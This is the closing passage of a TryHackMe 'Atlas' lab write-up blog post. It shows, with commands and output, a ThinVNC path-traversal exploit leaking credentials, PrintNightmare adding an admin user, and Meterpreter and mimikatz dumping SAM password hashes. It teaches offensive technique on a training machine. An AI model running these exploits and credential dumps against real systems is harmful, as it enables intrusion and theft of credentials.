AUTHORITY\SYSTEM<br><strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><p name="c52f" id="c52f" class="graf graf--p graf-after--pre graf--trailing">Wonderful.</p></div></div></section><section name="4caa" class="section section--body section--last"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><p name="03d5" id="03d5" class="graf graf--p graf--leading">With <code class="markup--code markup--p-code">SYSTEM</code> level privileges, I can now proceed to dump hashes onto the system. For persistence purposes, I will get the NTLM hash for the <code class="markup--code markup--p-code">Administrator</code> account.</p><p name="bf95" id="bf95" class="graf graf--p graf-after--p">I will use <em class="markup--em markup--p-em">Mimikatz</em> (<a href="https://attack.mitre.org/software/S0002/" data-href="https://attack.mitre.org/software/S0002/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">MITRE ATT&amp;CK Framework, 2017</a>) via Meterpreter’s <code class="markup--code markup--p-code">kiwi</code> extension to get the hashes with its <code class="markup--code markup--p-code">lsa_dump_sam</code> command:</p><pre name="e547" id="e547" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; load kiwi</strong><br>Loading extension kiwi...<br>  .#####.   mimikatz 2.2.0 20191125 (x64/windows)<br> .## ^ ##.  &quot;A La Vie, A L&#39;Amour&quot; - (oe.eo)<br> ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)<br> ## \ / ##       &gt; http://blog.gentilkiwi.com/mimikatz<br> &#39;## v ##&#39;        Vincent LE TOUX (vincent.letoux@gmail.com )<br>  &#39;#####&#39;         &gt; http://pingcastle.com / http://mysmartlogon.com  ***/</pre><pre name="c5e2" id="c5e2" class="graf graf--pre graf-after--pre">Success.</pre><pre name="e9dd" id="e9dd" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt; lsa_dump_sam</strong><br>[+] Running as SYSTEM<br>[*] Dumping SAM<br>Domain : GAIA<br>SysKey : 36c8d26ec0df8b23ce63bcefa6e2d821<br>Local SID : S-1-5-21-1966530601-3185510712-10604624</pre><pre name="54e6" id="54e6" class="graf graf--pre graf-after--pre">SAMKey : 6e708461100b4988991ce3b4d8b1784e</pre><pre name="a607" id="a607" class="graf graf--pre graf-after--pre">RID  : 000001f4 (500)<br>User : Administrator<br>  Hash NTLM: <strong class="markup--strong markup--pre-strong"><em class="markup--em markup--pre-em">*c16444961f67af7eea7e420b65c8c3eb*</em></strong></pre><pre name="ded4" id="ded4" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="de1b" id="de1b" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><p name="d491" id="d491" class="graf graf--p graf-after--pre">The kiwi module reports that <code class="markup--code markup--p-code">Administrator</code>’s NTLM hash is: <code class="markup--code markup--p-code">c16444961f67af7eea7e420b65c8c3eb</code>, which can be used for password cracking or pass-the-hash purposes (<a href="https://www.sans.org/white-papers/33219/" data-href="https://www.sans.org/white-papers/33219/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Hummel, C</a>).</p><p name="05d1" id="05d1" class="graf graf--p graf-after--p">Allora.</p><h3 name="f99b" id="f99b" class="graf graf--h3 graf-after--p">Summary</h3><p name="d88c" id="d88c" class="graf graf--p graf-after--h3">Despite this being an easy “tutorial room,” it took longer than it was supposed to because of my somewhat odd habit of deviating a bit from the instructions given by the room’s author. Hacking is all about breaking the rules and finding novel and clever solutions to conventional problems — especially in an offensive security problem.</p><p name="cc3f" id="cc3f" class="graf graf--p graf-after--p">Nonetheless, I have gone about using the PrintNightmare exploit as the author intended in Appendix A.2 for anyone interested. I have also manually exploited the ThinVNC vulnerability vector in Appendix A.1 for any overachievers.</p><h4 name="7eef" id="7eef" class="graf graf--h4 graf-after--p">Takeaways</h4><ul class="postList"><li name="2d47" id="2d47" class="graf graf--li graf-after--h4">Proof-of-concepts can sometimes be broken, so setup a virtual machine lab and make sure to test them first.</li><li name="4ae3" id="4ae3" class="graf graf--li graf-after--li">If proof-of-concept is broken, try to debug it, find a more reliable implementation online, or even engineer it yourself. I went with the second and (sort of) third for exploiting ThinVNC.</li><li name="9d26" id="9d26" class="graf graf--li graf-after--li">Unless you are taking the <em class="markup--em markup--li-em">Offensive Security Certified Professional</em> exam, don’t be afraid to use Metasploit and Meterpreter to make your life easier ;-)</li></ul><h4 name="67be" id="67be" class="graf graf--h4 graf-after--li">Plug</h4><p name="406b" id="406b" class="graf graf--p graf-after--h4">Check out my friend Mira Lazine who, along with other associates, needs financial and emotional help. Check out the following links:</p><ul class="postList"><li name="bf7d" id="bf7d" class="graf graf--li graf-after--p">Her Twitter profile: <a href="https://twitter.com/MiraLazine" data-href="https://twitter.com/MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://twitter.com/MiraLazine</a></li><li name="8a95" id="8a95" class="graf graf--li graf-after--li">Her Medium profile: <a href="https://medium.com/@MiraLazine" data-href="https://medium.com/@MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener" target="_blank">https://medium.com/@MiraLazine</a></li><li name="75bb" id="75bb" class="graf graf--li graf-after--li">Donate to herself on Cash.App: <a href="https://cash.app/$MiraLazine" data-href="https://cash.app/$MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://cash.app/$MiraLazine</a></li></ul><h3 name="e6b7" id="e6b7" class="graf graf--h3 graf-after--li">Appendix</h3><h4 name="66ad" id="66ad" class="graf graf--h4 graf-after--h3">A.1 Manual exploitation</h4><p name="69d3" id="69d3" class="graf graf--p graf--startsWithDoubleQuote graf-after--h4"><a href="https://tryhackme.com/room/atlas" data-href="https://tryhackme.com/room/atlas" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“MurilandOracle” (2022a, task 4)</a> challenged the contender to execute the ThinVNC exploit manually. To get an idea of how the exploit that he engineered works, I will examine the relevant bits of its source code. The following is an excerpt or MurilandOracle’s fixing of the broken proof-of-concept:</p><figure name="866b" id="866b" class="graf graf--figure graf--iframe graf-after--p"><script src="https://gist.github.com/Alekseyyy/a621a72c2cf9b6487cf8313ccc2908eb?file=ctf.2022.tryhackme.atlas.fixed_excerpt.py.js"></script><figcaption class="imageCaption">After <a href="https://github.com/MuirlandOracle/CVE-2019-17662" data-href="https://github.com/MuirlandOracle/CVE-2019-17662" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">MurilandOracle (2022b)</a></figcaption></figure><p name="82ed" id="82ed" class="graf graf--p graf-after--figure">The important bits of MurilandOracle’s exploit is that it takes in arguments from the command line and stores the target URL is stored as a string in <code class="markup--code markup--p-code">url</code>. The port to attack is stored as an integer in the <code class="markup--code markup--p-code">port</code> variable.</p><p name="b8b2" id="b8b2" class="graf graf--p graf-after--p">The <code class="markup--code markup--p-code">url</code> uses an <code class="markup--code markup--p-code">http://</code> or <code class="markup--code markup--p-code">https://</code> depending on whether-or-not the <code class="markup--code markup--p-code">ssl</code> argument is used. The exploit then makes a <code class="markup--code markup--p-code">HTTP</code> request with a <code class="markup--code markup--p-code">GET</code> prepared statement. Specifically, the request that the exploit will make is:</p><pre name="6af8" id="6af8" class="graf graf--pre graf-after--p">http://atlas.thm:8080/abc/../../ThinVNC.ini</pre><p name="46ab" id="46ab" class="graf graf--p graf-after--pre">I “reproduced” the exploit manually by opening up a python3 shell and manually typing in commands after MurilandOracle’s exploit:</p><pre name="62ce" id="62ce" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna㉿deniers)-[~/atlas]<br>└─$ python3  </strong>                  <br>Python 3.9.11 (main, [redacted]) <br>[GCC 11.2.0] on linux<br>Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.<br><strong class="markup--strong markup--pre-strong">&gt;&gt;&gt; import requests<br>&gt;&gt;&gt; url_to_attack = &quot;http://atlas.thm:8080/abc/../../ThinVNC.ini&quot;<br>&gt;&gt;&gt; request = requests.Request(method=&quot;GET&quot;, url=url_to_attack)<br>&gt;&gt;&gt; prep_request = request.prepare()</strong><br><strong class="markup--strong markup--pre-strong">&gt;&gt;&gt; prep_request.url = url_to_attack<br>&gt;&gt;&gt; suss = requests.Session()</strong><br><strong class="markup--strong markup--pre-strong">&gt;&gt;&gt; attack = suss.send(prep_request, timeout=3)<br>&gt;&gt;&gt; attack.text</strong><br>&#39;[Authentication]\r\nUnicode=0\r\n<strong class="markup--strong markup--pre-strong"><em class="markup--em markup--pre-em">User=Atlas</em></strong>\r\n<strong class="markup--strong markup--pre-strong"><em class="markup--em markup--pre-em">Password=[redacted]</em></strong>\r\nType=Digest\r\n[Http]\r\nPort=8080\r\nEnabled=1\r\n[Tcp]\r\nPort=\r\n[General]\r\nAutoStart=1\r\n&#39;<br><strong class="markup--strong markup--pre-strong">&gt;&gt;&gt;</strong></pre><p name="3737" id="3737" class="graf graf--p graf-after--pre">Allora.</p><h4 name="06d0" id="06d0" class="graf graf--h4 graf-after--p">A.2 Dumping hashes with Mimikatz</h4><p name="ad26" id="ad26" class="graf graf--p graf-after--h4">I have a bad habit of “mixing things up” when doing tutorial room where I violate the rules a bit. In this room, I used the <em class="markup--em markup--p-em">Meterpreter</em> module after doing privilege escalation.</p><p name="85ce" id="85ce" class="graf graf--p graf-after--p">On the target machine, I opened up PowerShell and launched the InvokeNightmare exploit like earlier:</p><pre name="fc5c" id="fc5c" class="graf graf--pre graf-after--p">Windows PowerShell<br>Copyright (C) Microsoft Corporation. All rights reserved.</pre><pre name="64c6" id="64c6" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt; Import-Module \\tsclient\atlas\CVE-2021-1675\CVE-2021-1675.ps1</strong></pre><pre name="991b" id="991b" class="graf graf--pre graf-after--pre">Security warning<br>Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your<br>computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning<br>message. Do you want to run \\tsclient\atlas\CVE-2021-1675\CVE-2021-1675.ps1?<br>[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is &quot;D&quot;): <strong class="markup--strong markup--pre-strong">*R*</strong><br><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt; Invoke-Nightmare</strong><br>[+] using default new user: adm1n<br>[+] using default new password: P@ssw0rd<br>[+] created payload at C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll<br>[+] using pDriverPath = &quot;C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll&quot;<br>[+] added user  as local administrator<br>[+] deleting payload from C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll<br><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt; net user</strong></pre><pre name="064a" id="064a" class="graf graf--pre graf-after--pre">User accounts for \\GAIA</pre><pre name="205d" id="205d" class="graf graf--pre graf-after--pre">-------------------------------------------------------------------------------<br>adm1n <strong class="markup--strong markup--pre-strong">[*]</strong>                 Administrator            Atlas<br>DefaultAccount           Guest                    WDAGUtilityAccount<br>The command completed successfully.</pre><pre name="b6cc" id="b6cc" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt;</strong></pre><p name="d669" id="d669" class="graf graf--p graf-after--pre">The user <code class="markup--code markup--p-code">adm1n</code> was added with the password <code class="markup--code markup--p-code">P@ssw0rd</code>. To get an administrator command prompt interface, I used the command:</p><pre name="bf89" id="bf89" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt; </strong><code class="markup--code markup--pre-code"><strong class="markup--strong markup--pre-strong">Start-Process powershell &#39;Start-Process cmd -Verb RunAs&#39; -Credential adm1n</strong></code></pre><p name="191c" id="191c" class="graf graf--p graf-after--pre">And the following window comes up (Fig. 9):</p><figure name="956b" id="956b" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*Yl4sgTNPjuvPt54-lQwc1g.png" data-width="347" data-height="292" src="https://cdn-images-1.medium.com/max/800/1*Yl4sgTNPjuvPt54-lQwc1g.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 9</strong></figcaption></figure><p name="9d38" id="9d38" class="graf graf--p graf-after--figure">I typed in <code class="markup--code markup--p-code">P@ssw0rd</code> in the password field (Fig. 9a), then a user access control window comes up asking if I wanted to run the command prompt as an administrator — and I clicked on “yes.” I then ran PowerShell from the command prompt. To work out what privileges that I have, I ran <code class="markup--code markup--p-code">whoami /groups</code> on the command prompt. The following table depicts the output (Fig. 10):</p><figure name="0f67" id="0f67" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*wKd5cmQOjAzO4bsrH_UDlA.png" data-width="1700" data-height="338" src="https://cdn-images-1.medium.com/max/800/1*wKd5cmQOjAzO4bsrH_UDlA.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 10</strong></figcaption></figure><p name="00b7" id="00b7" class="graf graf--p graf-after--figure">The BUILTIN\Administrators and Mandatory Label\High Mandatory Level indicated that this command prompt instance is running as an administrator.</p><p name="c222" id="c222" class="graf graf--p graf-after--p">Now I will proceed to dump the hashes on the system. I downloaded <code class="markup--code markup--p-code">mimikatz_trunk.zip</code> (<a href="https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2" data-href="https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Delpy, 2021</a>) and extracted it to my AttackBox’s project folder. Then I loaded from the target machine’s command prompt:</p><pre name="f242" id="f242" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">PS C:\Windows\system32&gt; \\tsclient\atlas\mimikatz\x64\mimikatz.exe</strong></pre><pre name="4fc5" id="4fc5" class="graf graf--pre graf-after--pre">.#####.   mimikatz 2.2.0 (x64) #19041 [redacted]<br> .## ^ ##.  &quot;A La Vie, A L&#39;Amour&quot; - (oe.eo)<br> ## / \ ##  /*** Benjamin DELPY `gentilkiwi`(benjamin@gentilkiwi.com )<br> ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz<br> &#39;## v ##&#39;       Vincent LE TOUX (vincent.letoux@gmail.com )<br>  &#39;#####&#39;        &gt; https://pingcastle.com / https://mysmartlogon.com ***/</pre><pre name="26d4" id="26d4" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">mimikatz #</strong></pre><p name="a321" id="a321" class="graf graf--p graf-after--pre">I will elevate privileges:</p><pre name="507e" id="507e" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">mimikatz # privilege::debug</strong><br>Privilege &#39;20&#39; OK</pre><pre name="82c4" id="82c4" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">mimikatz # token::elevate</strong><br>Token Id  : 0<br>User name :<br>SID name  : NT AUTHORITY\SYSTEM</pre><pre name="f12e" id="f12e" class="graf graf--pre graf-after--pre">672     {0;000003e7} 1 D 24844          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary<br> -&gt; Impersonated !<br> * Process Token : {0;001f08ca} 1 F 2417912     GAIA\adm1n      S-1-5-21-1966530601-3185510712-10604624-1009    (13g,24p)       Primary<br> * Thread Token  : {0;000003e7} 1 D 2465700     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)</pre><p name="c536" id="c536" class="graf graf--p graf-after--pre">And then dump the SAM database:</p><pre name="f3ad" id="f3ad" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">mimikatz # lsadump::sam</strong><br>Domain : GAIA<br>SysKey : 36c8d26ec0df8b23ce63bcefa6e2d821<br>Local SID : S-1-5-21-1966530601-3185510712-10604624</pre><pre name="8862" id="8862" class="graf graf--pre graf-after--pre">SAMKey : 6e708461100b4988991ce3b4d8b1784e</pre><pre name="c365" id="c365" class="graf graf--pre graf-after--pre">RID  : 000001f4 (500)<br>User : Administrator<br>  Hash NTLM: c16444961f67af7eea7e420b65c8c3eb</pre><pre name="68af" id="68af" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="aed3" id="aed3" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">mimikatz #</strong></pre><p name="5c64" id="5c64" class="graf graf--p graf-after--pre">Allora.</p><h3 name="f756" id="f756" class="graf graf--h3 graf-after--p">References</h3><p name="80d3" id="80d3" class="graf graf--p graf-after--h3">Attrition.org (c.a. 1998). <em class="markup--em markup--p-em">Technical Wonder: Firewalls</em>. Retrieved on Apr. 22, 2022 from: <a href="https://attrition.org/errata/charlatan/carolyn_meinel/www/tech-06.html" data-href="https://attrition.org/errata/charlatan/carolyn_meinel/www/tech-06.html" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://attrition.org/errata/charlatan/carolyn_meinel/www/tech-06.html</a></p><p name="511f" id="511f" class="graf graf--p graf-after--p">Chandel, R. (2019). <em class="markup--em markup--p-em">Get Reverse-shell via Windows one-liner</em>. Hacking Articles. Retrieved on Apr. 24, 2022 from: <a href="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" data-href="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/</a></p><p name="27cb" id="27cb" class="graf graf--p graf-after--p">Cunningham, D. and Goodwin, M. (2015). <em class="markup--em markup--p-em">The Age of Selfishness: Ayn Rand, Morality, and the Financial Crisis [Book Cover]</em>. Harry N. Abrams.</p><p name="b531" id="b531" class="graf graf--p graf-after--p">Cybele, M., Ricardi, G. and “Hugo” (n.d.). <em class="markup--em markup--p-em">ThinVNC — Web Remote Desktop</em>. SourceForge Repository. Retrieved on Apr. 23, 2022 from: <a href="https://sourceforge.net/projects/thinvnc/" data-href="https://sourceforge.net/projects/thinvnc/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://sourceforge.net/projects/thinvnc/</a></p><p name="db04" id="db04" class="graf graf--p graf-after--p">Delpy, B. (2021). <em class="markup--em markup--p-em">2.2.0 20210810–2 Windows 365 Web passwords junk-fix</em>. GitHub Repository. Retrieved on May 5, 2022 from: <a href="https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2" data-href="https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2</a></p><p name="af5c" id="af5c" class="graf graf--p graf-after--p">Hummel, C. (2009). <em class="markup--em markup--p-em">Why Crack When You Can Pass the Hash</em>? SANS Institute. Retrieved on May 4, 2022 from: <a href="https://www.sans.org/white-papers/33219/" data-href="https://www.sans.org/white-papers/33219/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.sans.org/white-papers/33219/</a></p><p name="9566" id="9566" class="graf graf--p graf-after--p">Liang, H., Chen, L. and Xu, S. (2021). <em class="markup--em markup--p-em">Understanding the Remote Desktop Protocol (RDP)</em>. Microsoft Docs. Retrieved on Apr. 22, 2022 from: <a href="https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol" data-href="https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol</a></p><p name="945f" id="945f" class="graf graf--p graf-after--p">Metasploit Unleashed (n.d.). <em class="markup--em markup--p-em">About the Metasploit Meterpreter</em>. Offensive Security. Retrieved on Apr. 24, 2022 from: <a href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/" data-href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/</a></p><p name="362f" id="362f" class="graf graf--p graf-after--p">Microsoft Docs (2013). <em class="markup--em markup--p-em">Introduction to HTML Applications (HTAs)</em>. Retrieved on Apr. 24, 2022 from: <a href="https://docs.microsoft.com/en-us/previous-versions/ms536496%28v=vs.85%29" data-href="https://docs.microsoft.com/en-us/previous-versions/ms536496(v=vs.85)" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://docs.microsoft.com/en-us/previous-versions/ms536496(v=vs.85)</a></p><p name="6fe0" id="6fe0" class="graf graf--p graf-after--p">Microsoft Security Response Center (2021). <em class="markup--em markup--p-em">Windows Print Spooler Remote Code Execution Vulnerability</em>. Retrieved on Apr. 25, 2022 from: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" data-href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527</a></p><p name="bbc3" id="bbc3" class="graf graf--p graf-after--p">MITRE ATT&amp;CK Framework (2017). <em class="markup--em markup--p-em">Mimikatz</em>. Retrieved on Apr. 29, 2022 from: <a href="https://attack.mitre.org/software/S0002/" data-href="https://attack.mitre.org/software/S0002/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://attack.mitre.org/software/S0002/</a></p><p name="3055" id="3055" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“MurilandOracle” (2021a). <em class="markup--em markup--p-em">Atlas</em>. TryHackMe. Retrieved on May 5, 2022 from: <a href="https://tryhackme.com/room/atlas" data-href="https://tryhackme.com/room/atlas" class="markup--anchor markup--p-anchor" rel="nofollow noopener noopener noopener" target="_blank">https://tryhackme.com/room/atlas</a></p><p name="a13b" id="a13b" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“MurilandOracle” (2021b). <em class="markup--em markup--p-em">CVE-2019–17662</em>. GitHub Repository. Retrieved on Apr. 23, 2022 from: <a href="https://github.com/MuirlandOracle/CVE-2019-17662" data-href="https://github.com/MuirlandOracle/CVE-2019-17662" class="markup--anchor markup--p-anchor" rel="nofollow noopener noopener" target="_blank">https://github.com/MuirlandOracle/CVE-2019-17662</a></p><p name="d424" id="d424" class="graf graf--p graf-after--p">nmap (n.d.). <em class="markup--em markup--p-em">Nmap: the Network Mapper — Free Security Scanner</em>. Retrieved on Apr. 22, 2022 from: <a href="https://nmap.org/" data-href="https://nmap.org/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://nmap.org/</a></p><p name="641c" id="641c" class="graf graf--p graf-after--p">Red Hat Customer Portal (n.d.). <em class="markup--em markup--p-em">TCP Wrappers Configuration Files Red Hat Enterprise Linux 6</em>. Retrieved on Apr. 22, 2022 from: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sect-security_guide-tcp_wrappers_and_xinetd-tcp_wrappers_configuration_files" data-href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sect-security_guide-tcp_wrappers_and_xinetd-tcp_wrappers_configuration_files" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sect-security_guide-tcp_wrappers_and_xinetd-tcp_wrappers_configuration_files</a></p><p name="6810" id="6810" class="graf graf--p graf-after--p">Remmina (n.d.). <em class="markup--em markup--p-em">Remote desktop client with RDP, SSH, SPICE, VNC and X2Go protocol support</em>. Retrieved on Apr. 23, 2022: <a href="https://remmina.org/" data-href="https://remmina.org/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://remmina.org/</a></p><p name="0088" id="0088" class="graf graf--p graf-after--p">Stewart, C. and Hammond, J. (2021). <em class="markup--em markup--p-em">PrintNightmare LPE (PowerShell)</em>. GitHub Repository. Retrieved on Apr. 26, 2022 from: <a href="https://github.com/calebstewart/CVE-2021-1675" data-href="https://github.com/calebstewart/CVE-2021-1675" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://github.com/calebstewart/CVE-2021-1675</a></p><p name="f0d0" id="f0d0" class="graf graf--p graf-after--p graf--trailing">Tumamlapalli, N. (2019). <em class="markup--em markup--p-em">ThinVNC 1.0b1 — Authentication Bypass</em>. Exploit Database. Retrieved on Apr. 23, 2022 from: <a href="https://www.exploit-db.com/exploits/47519" data-href="https://www.exploit-db.com/exploits/47519" class="markup--anchor markup--p-anchor" rel="nofollow noopener noopener" target="_blank">https://www.exploit-db.com/exploits/47519</a></p></div></div></section>
</section>
<footer><p>By <a href="https://medium.com/@EpsilonCalculus" class="p-author h-card">Aleksey</a> on <a href="https://medium.com/p/c3dff235d109"><time class="dt-published" datetime="2022-05-06T06:37:14.419Z">May 6, 2022</time></a>.</p><p><a href="https://medium.com/@EpsilonCalculus/tryhackme-writeup-atlas-c3dff235d109" class="p-canonical">Canonical link</a></p><p>Exported from <a href="https://medium.com">Medium</a> on June 14, 2022.</p></footer></article></body></html>